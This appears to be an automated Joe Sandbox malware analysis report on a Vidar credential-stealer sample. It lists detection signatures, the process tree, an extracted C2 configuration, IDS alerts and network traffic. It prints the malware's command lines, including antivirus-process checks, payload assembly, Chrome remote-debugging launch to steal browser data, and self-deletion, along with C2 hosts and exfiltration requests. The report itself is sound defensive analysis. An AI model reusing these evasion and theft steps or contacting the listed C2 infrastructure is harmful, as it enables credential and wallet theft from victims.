Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9EI7wrGs4K.exe

Overview

General Information

Sample name:9EI7wrGs4K.exe
renamed because original name is a hash value
Original sample name:8eb4f92605e35c57a42b0917c221d65c.exe
Analysis ID:1579617
MD5:8eb4f92605e35c57a42b0917c221d65c
SHA1:0e64d77ef1b917b3afe512b49710250c71369175
SHA256:b57d78d93f74f7ae840ab03d3fda4f22a24ad35afcf9a53128cf82a92a67a085
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9EI7wrGs4K.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\9EI7wrGs4K.exe" MD5: 8EB4F92605E35C57A42B0917C221D65C)
    • cmd.exe (PID: 7324 cmdline: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7420 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7456 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7464 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7500 cmdline: cmd /c md 245347 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7516 cmdline: findstr /V "profiles" Organizing MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7532 cmdline: cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dry.com (PID: 7548 cmdline: Dry.com b MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 1228 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6348 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7564 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000A.00000002.2461862261.000000000406D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              10.2.Dry.com.3f90000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Dry.com b, ParentImage: C:\Users\user\AppData\Local\Temp\245347\Dry.com, ParentProcessId: 7548, ParentProcessName: Dry.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7928, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7324, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7464, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:21:29.220597+010020442471Malware Command and Control Activity Detected94.130.188.57443192.168.2.449745TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:21:31.758950+010020518311Malware Command and Control Activity Detected94.130.188.57443192.168.2.449746TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:21:29.220536+010020490871A Network Trojan was detected192.168.2.44974594.130.188.57443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T06:21:24.647125+010028593781Malware Command and Control Activity Detected192.168.2.44974394.130.188.57443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: 9EI7wrGs4K.exeReversingLabs: Detection: 21%
                Source: 9EI7wrGs4K.exeVirustotal: Detection: 18%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.5% probability
                Source: 9EI7wrGs4K.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: 9EI7wrGs4K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4DC54
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A087
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00B5A1E2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00B4E472
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00B5A570
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B566DC FindFirstFileW,FindNextFileW,FindClose,10_2_00B566DC
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1C622 FindFirstFileExW,10_2_00B1C622
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00B573D4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B57333 FindFirstFileW,FindClose,10_2_00B57333
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00B4D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\245347Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\245347\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 11MB later: 41MB

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49745 -> 94.130.188.57:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.4:49745
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49743 -> 94.130.188.57:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.4:49746
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 94.130.188.57 94.130.188.57
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 44.206.23.126
                Source: unknownTCP traffic detected without corresponding DNS query: 44.206.23.126
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 18.66.161.122
                Source: unknownTCP traffic detected without corresponding DNS query: 13.227.8.41
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 18.66.161.122
                Source: unknownTCP traffic detected without corresponding DNS query: 13.227.8.41
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 18.66.161.122
                Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.179
                Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.179
                Source: unknownTCP traffic detected without corresponding DNS query: 18.66.161.122
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.179
                Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.179
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00B5D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: chrome.exe, 0000000F.00000003.2035434844.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035317380.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035235015.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000003.2035434844.0000335C003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035317380.0000335C00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2035235015.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: global trafficDNS traffic detected: DNS query: bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----T0ZUSR1VAI58QQI5XT2DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
